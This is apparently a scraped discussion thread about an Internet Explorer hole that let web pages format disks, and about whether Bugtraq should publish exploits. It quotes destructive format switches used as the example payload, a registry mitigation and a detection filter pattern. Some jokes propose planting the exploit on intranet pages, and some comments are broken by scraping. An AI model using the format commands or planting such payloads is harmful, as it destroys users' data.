Although it's nice, I don't care too much about popup blocking, I usually can close them before they go under or start spawning. Of course, it may help that I don't spend my days at porno sites, where this could be a bigger issue. Tabbed browsing is also cool, but only marginally more efficient than lots of stacked windows. Standards support is not much of an issue, as most pages are written and tested for MSIE's faulty implementation of the standards anyway. On Mac, IE has much better plugin support than Mozilla, and more importantly, integrates better with Aqua so as to perform faster (for stuff like window resizes) and looks better. Furthermore, if you want to talk standards compilance, IE conforms better to Apple's interface guidelines than Mozilla by quite a bit.
Then there's Chimera, which is sort of the Mac equivalent of Phoenix. The main advantages of Chimera (over Mozilla) are that it loads faster and runs faster/with less memory, and that the features of Mozilla that it preserves happen to coincide with the ones I use (tabbed browsing and popup blocking). Its interface is a bit nicer. Furthermore, it is a Cocoa app, which means better system intergration and that I can use Cocoa gestures. I am writing this post from Chimera. But it still runs slow, violates various interface guidelines (eg keeping related interface elements in the same font, size, style), crashes more often than explorer, and lacks many of the features that I do use (selection-completion, for example). It also has poor plugin support. Chimera is only version 0.6, so we can expect this to improve later, and it is already the second-best Mac browser I've tried.
I've only tried Opera briefly, but the free version seems no better than Chimera. It doesnt block banners, just replaces them with its own. It runs slower than Chimera, is buggy, and is a Carbon app (not Cocoa). It seems to have lots of features, but I started by turning most of them off anyway. And it's adware, which is annoying.
Overall, although there are several features I'd like to see in Explorer, but it is the best that is available for what I do on the web. After that, Chimera is the best, and should get better.
I hereby place the above post in the public domain.
well i got to the end, no real surprises, except whenever java is mentioned out crawls the ms worm - i know im going to get flamed but i work for ms and listen java isnt healthy, bla, bla, microsoft loves you, bla, bla
where are you worm, defend yourself now, well you can't, but show yourself and talk some crap
i love you
i love my win 98
i love bills cheesy schlong
i will make you richer baby
please dont kill the internet
god help Microsoft if someone managed to get this code on windowsupdate or even *shudder* this site.
Then it doesn't matter at all what Bugtraq does. However, you think this means they shouldn't publish exploits. Your logic is all backwards.
If it doesn't matter what BugTraq publishes, then BugTraq should publish exploits ported to as many programming languages and platforms as pssible, for educational enlightenment.
Copyright Violation:"theft, piracy"::Anti-Trust Violation:"thermonuclear price terrorism"<-Overly dramatic language.
IE bugs can format a hdd now. What's next? A bug that will literally kill you in your chair.
:)
Actually, that might make msgboard moderation a lot easier. Die, troll!
It's perfectly fair to post full source code for the exploit. If I discovered it, I would sure disclose as much as I could, that's how you get known in the security business. Disclosing holes in detail is how you build a reputation. It demonstrates that you understand the flaw in great detail. This is Microsoft's problem, it's their software that has a hole in it, Microsoft is responsible for all damage caused by this hole. Just like the Linus can't blame somebody for disclosing a hole in Linux.
Showing people how to automatically format hard disks from a Web page isn't 'full disclosure,'" Smith said. "It is malicious code writing. To an outsider, Symantec's actions give the impression that they are encouraging people to create and release malicious code.
Yeah, and reading Mein Kampf will make me a nazi.
Reading about guns will make an assassin.
Reading Kama Sutra will make me a Don Juan.
Reading Juan Manuel Fangio's biography will make me a F1 racer.
But not reading any of these will make me dumb.
Difficult choice, isn't?
Buy a Nintendo DS Lite
it became available over SIX months after the exploit was widely used by haxor/scripto-kiddies... Is it more significant that it took microsoft six months from that time to fix the problem, or that it took two weeks from the time it was used to down microsoft.com websites running on (then unhackable (HA!) NT)
Does this have any relavance? If someone somehow turns the bug on MS they patch it, otherwise it is deemed to be a non-issue.
Anyhow...
Does anyone know of any MS webservers that are lacking in the patch department, so that MS might further the distribution of this exploit?
(I bet a dollar that it would be fixed then!)
-AC
Ugh. This is so f???ing unbelievable. It's just so incredible that I have decided for my own needs -- yes, my opinion and not intended to be construed as defamation of MS's character -- that all theses IE exploits will remain unfixed because of the world domination meglomania that is MS. At a snap of their fingers, if things don't go their way, they could just pull the plug, thereby f???ing up the rest of the world. No one has stopped them and I am convinced no one can.
First of all, stay away from MS products.. Check!
Second, don't visit unknown links... Check!
Third, Disable pop-ups, block what can be blocked in the browser. Check!
Fourth, upgrade your OS with the latest patches and fixes, (Gentoo here, emerge -u world)... Check!
Fifth, implement a nazi firewall... Check!
Looks good so far, have never had an attack or lost data due to a security hole. I can sleep in peace.
If you mod me down, I *will* introduce you to my sister!
It seems posting malicious code is alot of like providing links to pre-release code for a certain up coming game.
Slashdot comments can be accurate, highly modded, or posted quickly. Pick two.
now lets give everyone working guns so we can force smeone to come out with a fix for this exploit
Ok, here's my take on this, I know its probably been said a hundred times already and/or I'm gonna get ripped up, but here goes the proverbial toe in the water of this debate for me:
1) If you're using IE you should realize that you are lucky if a day goes by and your system is not formatted or taken over by script kiddies.
2) M$ probably will not issue a patch in a timely manner anyways, whether or not they are notified and the exploit code is realeased.
3) The code will get around the internet anyways, with or without Bugtraq. Script kiddies will get it from other public forums.
4) Most importantly (and perhaps up for debate): Having access to exploit code allows people to play around with security fixes until they can solve the problem themselves. Sure, you can just look at the fixes posted by the people who find the exploits, but its better to tinker and try to solve the problem yourself and learn. The code itself isn't intrinsically bad, its the intent of the people with it. Its like gun control in America (ok, trying to hold top on can of worms now). Personally I don't think we should restrict access to exploit code (or guns for that matter...DAMMIT WORMS GET BACK IN THERE!!!) because people could do bad things with it. Those people will get their hands on the code anyways, or just go find new ways of doing bad things because that's what bad people do.
"But that's just my opinion, I could be wrong" - Dennis Miller
No more clogging of the Apache error logs looking for default.ida, default.ida will now exist with a javascript. Of course I'm not mean enough to delete their harddrive but they might wonder why they left open a command window saying their computer is infected with Code Red.
Seriously, why can't people put his in perspective ? After all, it's just another MS bashing session.
:-). Their data should be stored on a server somewhere, and their mail will be safe.
A bug like this may affect home users - all they need to do is reload Windows and restore their data - CD-ROM burners are cheap, and it's not too much to get a copy of Ghost to snapshot a computer.
In a corporate environment, if people kill their desktop computer, you just reload off a standard image (Ghost again
If people have a REAL problem, then maybe they should simply switch web browsers. IE is a defacto standard but if you kill the Icon and load up netscape or Mozilla and avoid the problem. If you're really serious, build a Unix/Linux host somewhere on your lan, load up Opera, and give everyone an XTerminal emulator to run it remotely.
Bugs like this should be posted ASAP. Companies like Microsoft have wads of cash - instead of dlushing it away on EAL4 Certification of defunct products, they need their priorities realigned to deal with this kind of threat.
If you have a problem with IE 'security' write to your local Microsoft office. Write to your congresscritter, complaining about this threat to national security and Microsofts irresponsible attitude to their customers.
Keeping quite about this kind of hole simply slows down the release of fixes. This adversely affects those who run a tight ship, and accomodates those who slack off - totally the wrong way around.
If defects like this cost some IT weenie their job, it's not a problem, it's an opportunity for improvement.
With all the exploits I keep hearing about IE it makes me so glad that in windows I have started using Mozilla more then IE. Yes, I still use windows but I am slowly moving over to Linux.
I fail to see how this is controversial in the least. It is just another bug found in a piece of software full of bugs. The guy reporting it gave Microsoft a full month before he went public, that should have been more than enough time to build a patch.
As for the exploit itself, whats wrong with the code he wrote? If it scares the PHB's into actually demanding a more secure IE from MS then all the better.
The suggested payload should have been something that broke IE. Those vulnerable would have done themselves a favor, and the network admins would get a good excuse to spread an alternative like mozilla or opera.
Stop the brainwash
Just wait until someone writes their fun exploit code to set up a DDoS at your company then makes it the yahoo.com home page. There is more to Internet security than covering your own a$$; helping to keep the average user safe should be a concern for all.
In fact, there were a few machines for which we did not have root password and we used the exploit to patch the machine (closing the hole behind us).
Having a very visible exploit definitely helps NOT only the vendor, but the reluctant administrator!
Quality only comes through the finding (exploiting) of bugs. Covering up problems is not the answer. Ignoring problems for which there are no known exploits is also not the answer.
No worries, I'll just pop over to windowsupdate.microsoft.com and get the latest bug fixes. Oh, what's this? The new v4 Windows Update for Win98 crashes Internet Exploder 6 SP1 on both my Win98 PC at home and my Win98SE PC at work.
Ooo, I love Fallacity. Fallacity two was the one where she first met Ben, right?
So does Windows XP, and look at all the good press that's gotten Microsoft.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
Post your IP address and the version of Windows you are running. When your system is destroyed, you can write the article you just described.
I know as a software developer myself if someone were to contact me with a recepie for a defect I didn't think existed with a "I made sure these steps wouldn't really work, just change it until it does" I probably would not put much effort into investigating. And I'm willing to bet this exploit didn't make it to very many programemrs within Microsoft.
And how, exactly, do you know when you're running "trusted code"? For years, security experts recited the mantra that you couldn't get an e-mail virus just from reading your mail, and you had to actually run an attachment to get infected. Then MS screwed up with the scripting in things like Outlook (Express), and suddenly all the non-techies in the world, trusting their techie colleagues about the virus thing, are getting caught. Whose fault is this? I sure as hell don't want or expect to run any code automatically just because it's part of an e-mail I'm reading, but MS left me no choice if I use that product, and of course many have no choice about that, either.
No, I think bitching about scripting and APIs that let code run on my box when I neither want nor expect it to is quite justified, thanks very much.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
The fix is located here and here. I've already "patched"...
It's quite indifferent really, if you choose to do something bad with it.. that's irresponsible, and possibly illegal... I like running exploit code on my machine, or on a clients machine, because sometimes explaining the vulnerability to them doesn't stress it's importance (it's just gibersh). I'm pretty sure exploit code wouldn't be of use to a savvy sysadmin with a debugger, dissasembler, and a hex editor, oh wait, nm, I guess they could tweak their binaries in many cases to not be susceptible to the exploit (without necessarily eradicating the bug).
Certainly not /. But all this talk about script kiddies would make you think they are everywhere. IMHO most kiddies are playing video games, watching T.V., increasing world population, cultivating herbs, ect. ect. Where the hell are all the kiddies so eager/informed enough to run malicious scripts from a fixed ip or hack a current website and insert the canned code. I personally don't think the so called script kiddies are that dumb. Just like the PSA's say if you smoke pot you'll get grounded and if you create malicious viruses you won't get to smoke pot.
The truth suffers more from convictions than from lies.
Dear World,
Why is my browser even capable of formating a hard disk? A browser has practical need for system level capabilities like this.
Later,
Slashdot Junky
.
Landfill Mining Co.
Managing the (Un)natural Resources of Tomorrow
That seems way over the odds to me. I've spent the last couple of weeks fixing several bugs in a product within about 24-48 hours, when all that was at stake was a business deadline. When I couldn't find the bug myself, I called on other members of the team to help out, but in all cases, we had a satisfactory solution well inside a week, and usually the same day.
Security flaws are usually caused by careless errors that could easily be prevented. They can often be fixed in a few minutes once identified, and tested shortly afterwards. Companies who provide widely used critical software like operating systems or communications tools really shouldn't have a problem getting things turned around within 24 hours. If they do, either their code is so screwed up that it's totally unsuitable for use in a potentially vulnerable environment (granted, Microsoft have actually made exactly this claim about several versions of Windows in recent months) or they seriously need to reconsider how they run their response to security vulnerabilities that are reported.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
As I suggested in the July thread on the acquisition topic, Symantec scooped up SecurityFocus as a means to put the brakes on the full disclosure movement.
This exploit is so severe it will no doubt cause the clueless masses to clamor in fear and demonize the full disclosure movement. It would not surprise me in the least if lobbyists for the likes of Microsoft leverage this news event to spin the next pro-Microsoft bill through the legislature.
By this time, the "top dogs" from the old SecurityFocus have no doubt been kerneled and firewalled by Symantec Jr. Exec's filtering their communication traffic both in and out, and managing their task lists. As soon as these guys realize their upcoming irrelevance in the brave new world that is now SecurityFocus, they will be presented with a choice: to a) burn through all the cash Symantec just handed them in litigation to regain control of the firm or b) pursue other interests, as long as none of those interests compete with Symantec, well at least for the next five years.
What a terrible brain drain for the security community.
I do not wish to minimize the efforts and contributions made by the founders of bugtraq...They were an essential catalyst to the full disclosure movement. Still, it is the community that brings life to the movement. IMO, it is time for the community to respond to this situation by establishing a new forum for full disclosure that is outside the influence of corporate interests.
I regret I have only my insight to contribute.
Erm... You have exactly that much control in Windows XP. If updates are available, you are invited to download them, at which point you can follow links to relevant descriptions, KB articles, or what have you. You can then opt to install (or not) on a selective basis. And it checks for updates automatically as well.
I'm sorry, but your post is nothing but pure, unadulterated FUD.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
What about people who pay for net access? A lot of those people don't use the auto update because they are on slow connections and it is costing them a lot of money to be on the net.
A lot of people still pay per minute to be connected to the Internet and using the auto update tool over a 56K modem can take quite a few minutes. Plus, if you have to reload for any reason, you have to go through the whole process again. The autoupdate solution doesn't give you the files with instructions, so you have to run up the phone bill twice.
Remove this key:F -9377- 00AA003B7A11}\Implemented Categories"
"HKEY_CLASSES_ROOT\CLSID\{ADB880A6-D8FF-11C
Disables the class's "safe for scripting" status.
Apparently it should never have been.
theBureaucrat
MS is recklessly endangering your computer and your data with their shoddy attention to security prior to release. I think BugTraq is doing us all a favor by pointing it out.
I've always used the analogy that running MS software is like deliberately driving a Ford Explorer with those Firestone tires on it.
Wow, given this kind of 'sploit, it would be pretty easy giving yourself a heart-attack from laughing on your last day on the job. Just modify the company's intranet login page to perform this exploit (using somebody else's account of course) and be sure nobody sees you having giggling like a lunatic. Charge a consulting fee if they beg-plead-demand that you come back and help.
Every new form of media has it's own Requirimento
I would probably have to admit that the trend had already begun before Symantec bought SecurityFocus this past summer. But as someone who has been reading bugtraq and other similar lists daily for years I feel the vigor in the bugtraq community isn't quite there any more. Heh, time will tell.
There is a contingent of Blackhats that would agree that revealing exploit code is irresponsible. They are quite vocal against doing so. The reason is simple. They don't want the holes they exploit closed. The more noise they make the more assured I am that releasing proof of concept/exploit code is the right thing to do.
When the buffer overflow technique became common knowledge and discussion of it became mundane the communities of programmers where this had happened greatly reduced the number of such bugs. The programmer communities where these bugs are still produced have little feedback/discussion or where young programmers have an arrongance that precludes them from learning from history/older programmers. (The latter observation explains why so many of the same errors keep getting made in software on a generational timespan.)
YMMV 8-)
I think, therefore, ken_i_m
Some people just can't upgrade. There are tons of people that have a computer without internet access. Are you retarded?
My policy is to give the developer first opportunity to allow them to acknowledge the bug. However, what happens if the developer fails to acknowledge the bug exists? It took CascadeSoft almost 4 months to patch a remote vulnerability I found in W3Mail and even then their fix contained a new hole. Whilst I'm quite happy to sit on a bug if the developer is doing the right thing, bad developers NEED to be named and shamed otherwise they'll never learn.
;>.
PS. I'm a nobody in the security world and CascadeSoft have since promised to treat security as a higher priority
Tim Brown
Comment removed based on user account deletion
This sort of reminds me of the issues related to on-line cheating in games such as Quake, Counter-Strike, etc. When you find an exploit, should you keep quiet, or should you tell everyone about it?
Well, I found a few exploits in the early versions CS (0.3, I think), and, "responsibly", I sent a message to its authors, detailing the problem and proposing a couple of solutions. I never even got a reply. A new version was released, and the exploit was still there. So I posted some (incomplete) information on the CS user forums. A new version was eventually released, and the exploits were still there. Eventually, websites started to post instructions on how to exploit those holes in the code, and cheating became generalised. Still it wasn't fixed. It wasn't until "cheat packs" (complete with InstallShield) became widely distributed that the CS team actually decided to work on the problem.
CS was free, though.
Microsoft has absolutely ludicrous profit margins, and that money comes from their clients. I think those clients are entitled to expect reasonably secure software and (failing that), at least a quick response to the problems. This problem has been known for some time and MS still hasn't fixed it. Something this serious needs to be dealt with quickly. If Microsoft won't do it, then the users should at least be given a chance to, by switching to a different browser, either temporarily or permanently.
You don't have to use IE. There are alternatives. The alternatives are free and they're available to anyone who uses IE.
But the only way to warn those users it through the media. And the media won't give this problem due coverage unless they understand how serious it is. And they won't understand how serious it is unless there are real exploits. And it should be made pretty clear to the media that this problem affects MSIE, not "computers" or "the internet".
The point is not to "punish Microsoft" (or IE users). The point is to make people realise that they are not safe while also showing them that they can be safe. Or at least a lot safer.
RMN
~~~
i dont know what kind of superhuman world you people are living in, but bugs are a thing with software, its not preventable.. ever - human error will *ALWAYS* occur as long as there is a human involved, because.. simply put, we are not perfect, this can be evidenced by the fact that both open and closed source software contains bugs... Im sure microsoft will have a hotfix out within a couple days.. in the mean time your asking for trouble using MSIE... security cant be completely up to the company providing the product, and thats what these warnings are for you know.. now that you know a thief is in the area, you better be damn sure to lock the doors to your car and your house,.. all the door can do is provide the lock, they cant lock it for you (actually newer cars do, but you get the idea)
Comment removed based on user account deletion
#1 Secured computing
#2 Skip #1
#3 ???
#4 PROFIT!!!
OR
"Secured Computing", where's the money in that?
I cant help thinking of that line in A Few Good Men where Nicholson's character says "All you did was weaken a country today. That's all you did."
This should be the goal of the Linux evangelists; that easy to install and enough of a Windows workalike that ordinary users don't notice/care when someone does that.
--
Benjamin Coates
this is the new goatse link:t ml
http://www.apple.com/switch/stories/gautamgodse.h
The best part is that he's impressed with iPhoto. It looks like iPhoto made one hell of a gaping impression.
THERE IS NO DATA. THERE IS O
You can't restrain information that doesn't want to be restrained. Has never worked, doesn't work, will never work. (Yes, you can delay it a little. But nothing more.)
What alternative does Symantec have? If they start rejecting exploits, someone else will start a forum where all exploits are allowed. I prefer to have all this information in a place where I can be sure that the relevant people read it.
Of course, those who posting an exploit without giving the vendor (whether that is MS or an free software project) sufficient time to prepare a patch, that would be irresponsible. But when someone else is committed to doing so, there is nothing you can do.
My point was that in the 20 some years the PC has been around, using one has become harder, not easier. We don't exist to serve the computer, it exists to serve us; we shouldn't have to spend hours configuring a system or debugging an installation. When it comes down to it, I shouldn't have to go searching for drivers, recompiling kernels, finagling with registries, etc... I should be able to turn on the machine and start using it.
So you had a good experience with RedHat. So have I. But how many more have given up after realizing that they lacked the expertise to partition their hard drive, or botched an installation because they installed the bootloader in the wrong place, or had incompatible hardware, etc...
Linux is not the solution, it's the problem. Windows is not the solution, either - it's the question (Where do I want to crash today...). The solution will be found when programmers come out of their collective holes and recognize that their users are not the computer experts that they are. The solution will come when computer scientists are able to differentiate between the way an OS could be designed, and the way it should be designed. As much as I like free software, I hate to say that I haven't seen anything original or creative come from it - most free software projects are simply copying an existing proprietary program. What needs to happen is that the open source community needs to step up to the plate and produce an OS that is easy to install and easy to use. And simple.
The society for a thought-free internet welcomes you.
CERIAS' Gene Spafford says overpowered, complex, general purpose machines that can do way more than people need are a big part of the problem.
Read the rest of this interview in which he discusses how increased, unnecesssary complexity combined with a lack of users' understanding of security vulnerabilities and issues, and manufacturers' lack of interest in building in security can make systems more vulnerable to attacks.
Dude; That post should have a spoiler warning!
After 30 years working with computers, and 20 years in Software QA, I can give you a very good reason why NOT to immediately apply all software updates immediately. It is virtually impossible (read that incredibly difficult and expensive) to write perfect software -- I've yet to see any personally. In my experience, it's all too painfully common for one bug fix to cause yet another bug to appear whether it's by breaking something that used to work or by revealing a previously hidden bug.
I've worked at companies that ran through a whole gamut of acceptance tests before they upgraded users' systems to a new release of anything. Their business depended on having a known platform for their users. Think of training, help desk, and the like.
I'm NOT saying users should not upgrade, only that there is a good reason for some users to not immediately install every new fix that comes down the pipe.
I have heard this reasoning many times before and people are overreacting.
... i had never thought of that before!!! "
... it is amazing how we keep having this argument over and over again.
Did the journalists gave the terrorists the idea to crash planes in the WTC? No they didnt. Did they give them the idea to hold a musical theatre hostage? Nope.
Lets face it terrorists are much better at being terrorists than journalists are. It would be stupid to believe that Osama is watching CNN and says "small pox
I guess Bugtraq is a bit different because there are a bunch of script kiddies out there that may actually get their info from bugtraq. But still if it is on Bugtraq all the good hackers already know about it.
Security trough obscurity is no security at all. Considering how all the places that require serious security, like banks etc., have believed in that principle for a while now
Imagine some big ass company like Woohoo, JCN, Bayarea Auctions, DreLL, or moon microsystems to lay off n% of their web developers due to the slowing economy. So Bob, not the stable type (we all have worked with someone like Bob), gets all bent out of shape and decides that he has a grudge against his employer, and decides to embed the malicious code into all of links of his companys website and reformat all of the visitors hard drives (talk about some bad fucking PR)....
Paranoid? maybe but just thinking
In the end they will lay their freedom at our feet, and say to us, "Make us your slaves, but feed us." - Dostoevsky
http://www.proxomitron.org/ can be used to nuke the javascript before it even starts. I don't know how robust it is against this exploit but it stops the demo on Neohapsis
Just add this to the patterns section of the config file:
Name = "Detect new IE exploit"
Active = TRUE
Bounds = ""
Limit = 5000
Match = "*(showHelp \(|"
"880a6-d8ff-11cf-9377-00aa003b7a11)*"
Replace = "WARNING: MSIE exploit attempted"
The Proxomitron can also stop any type of pop-up as well.
P.S. I didn't come up with that filter, a guest on Computer Cops did.
Here's yet another one published, and here's David Ahmad's response in light of these recenty discussions.
What I don't understand in this whole mess: when I hear "execute arbitrary code", I know something's horribly broken. Why is it worse if someone exemplifies "arbitray code" with "format a: /autotest" (in the ZDnet forum, reposted to BugTraq here) instead of
"winmine" (as in Sandblad's original advisory)? The important bit is "arbitrary code", no?
So what happens when I come along with a Field Programmable Gate Array and solve the problem 100 times faster than you expected?
I think the argument that open source implies better security is overrated. While it is possible for anyone to check the source code, almost no-one actually has the technical expertise, time and inclination to do so. Everyone else just trusts that other people will do so, which makes them every bit as vulnerable as those who installed a closed source system in the first place. The same goes for creating and distributing a patch: even in the Linux world, a high proportion of the development work in this area is actually done by the big distro vendors, not by the OSS community as a whole.
Compare and contrast with a closed source product from a good company. As others have noted elsewhere in this thread, Apple has turned out security fixes within nine hours from being notified of a vulnerability in the past. I'm betting you can't make that claim of many Linux patches.
Please don't equate Microsoft with closed source and Linux with open source. If you do, your comparisons will always be fundamentally flawed. I agree that security through obscurity is not the way forward, but just disclosing something (when that something is millions of lines of source code) is not, in itself, enough to provide security either.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
Does anyone have any evidence of virus protection companies directly or indirectly writing viruses? That's a curious question, not an indiginant and defensive question.
I don't make the rules. I just make fun of them.
/U /AUTOTEST
/U /SELECT?
or
I remember these worked in Win95 for skipping ALL the notifications, the latter doesn't even format correctly in a sense that it puts a filesystem back there.
I would bet just the opposite. Most "script kiddies" are in fact jr. high or high school age. They have a social "elite" consisting of a few college-age kiddies that haven't let go. These are guys that would write exploits or fix broken ones and pass out to all of their kiddie friends.
However you look at it, they're all children, regardless of how old they really are. This is why we call them kiddies.
Also, the sky is not blue and there is no porn on the internet.
I don't know about that sky thing, but I've found tons of porn on the internet.
-
- - You can't take something off the Internet! That's like trying to take pee out of a swimming pool.
...today, you cannot format the system drive. Period. NTFS will not release the drive and format requests (and requires) exclusive use before it will format.
The only way to format C: is to never start the Windows (NT) kernel, but boot from, say, an installation CD that doesn't lock parts of the drive.
(Thanks to whomever in this thread who pointed this out to me.)
If the exploit is there, it should be public. How else will anyone who is reasonably concerned defend themselves if information about their pottential situation is kept a secret?
The fault I find with your analogy is that I don't think it describes the posting of an exploit. How is saying 'people are being shot by a sniper by the name of Joe Smith who lives at 555 Some Street' so different from saying 'people are having X, Y and Z done to their systems by a security hole in IE that resides in the handling of javascript on malicious sites'? In both cases, relevant information, and nothing more, is being offered. Posting an exploit is more like saying 'people are being killed by a sniper. He or she operates something like this... <click> BANG!".
In 99.9% of cases, a working exploit is simply not nescessary to defend against a security hole. I mean, what would be the difference between someone explaining in detail what the problem is (and what options lay open to you for fixing it) and someone handing you the source for an exploit? There's only one that I can think of: in the latter case if you are irresponsible you can turn around and use that exploit agaist others. Exploits do not patch security holes. At best they're a sort of extortion used to get lazy software companies off their a$$es and write patches but they do nothing constructive in themselves.
As for the exploit already being out in the wild, if the white-hats aren't going to use it and all other relevant info can be disseminated without providing an exploit, then all Bugtraq did was spread the exploit to less cluefull black-hats.
Hopefully this has not been posted yet (too lazy to check), this is quite a funny transcript... http://www.cantrip.org/nobugs.html
"Never argue with an idiot, they'll just bring you down to their level and beat you with experience!" --Unknown
Way back when the first Macs were released there were sereous hardware defects Apple denied for a long time then finally had to admit only after they were fixed.
This permitted Apple to continue to sell defective hardware untill Apple could fix it.
Microsoft uses the same tactic but instead of fixing it they just sit.
Take e-mail viruses. Any soft of product review should it be able to reveal the obveous design flaw in the way Outlook express handles file attachents. Be that open source's many eyes or closed sources product review.
In fact the design planning that should be commen for all software would have picked this one up.
But Microsoft's proclamed suppereority to open source design philosophy falls flat on it's face with this one as Microsoft desides to ignore it.
Now let's admit a truth.. This happends in open source as well as closed when ever a programmer fails to consider or disguards possable problems.
It should happen less often in a corprate environment as the programmer has to work with managment and posably a team of programmers who might not approve of the original programmers lazyness.
But once the design phase is done and the code is laied down code review begins in open and closed source. Somebody should have noticed something.
The reason it wasn't picked up by Microsoft is plainly they don't care.
But give them the benifit of the doupt. Maybe somebody dropped LSD in the watercooler during the whole software dev process. Office pranks do happen.
So let's be really nice and say Microsoft just kinda messed up and never noticed this flaw.
When someone did and created the first real e-mail virus (instead of the rummored same) then Microsoft should have sat up and took notice.
Some times it takes a blindingly obveous result before a software team will notice.. that's again a universal truth and not unique to closed source.
But once done it's there for the world to see.
And Microsoft... IGNORED IT...
This is why we have e-mail viruses today.
Microsoft needs more than just a slap in the face.
Someday somebody's going to make a virus os that installs over Windows and while users will usually just reinstall Windows Microsoft will take the threat sereously.
I don't actually exist.
Bruce Schneier's take on this from the ever-excellent cryptogram is here:
Full Disclosure Article
-=DaveHowe=-
$M may be succeeding in getting bugtraq shutdown. I haven't received a bugtraq for several days, and this morning, securityfocus.com appears to be down. Maybe it's a routing error, but ...
I take no responsibility for what I say. Even though I'm never wrong
I thought it was an honest question... Ah well!
They are fools that think that wealth or women or strong drink or even
drugs can buy the most in effort out of the soul of a man. These things offer
pale pleasures compared to that which is greatest of them all, that task which
demands from him more than his utmost strength, that absorbs him, bone and
sinew and brain and hope and fear and dreams -- and still calls for more.
They are fools that think otherwise. No great effort was ever bought.
No painting, no music, no poem, no cathedral in stone, no church, no state was
ever raised into being for payment of any kind. No parthenon, no Thermopylae
was ever built or fought for pay or glory; no Bukhara sacked, or China ground
beneath Mongol heel, for loot or power alone. The payment for doing these
things was itself the doing of them.
To wield onself -- to use oneself as a tool in one's own hand -- and
so to make or break that which no one else can build or ruin -- THAT is the
greatest pleasure known to man! To one who has felt the chisel in his hand
and set free the angel prisoned in the marble block, or to one who has felt
sword in hand and set homeless the soul that a moment before lived in the body
of his mortal enemy -- to those both come alike the taste of that rare food
spread only for demons or for gods."
-- Gordon R. Dickson, "Soldier Ask Not"
- this post brought to you by the Automated Last Post Generator...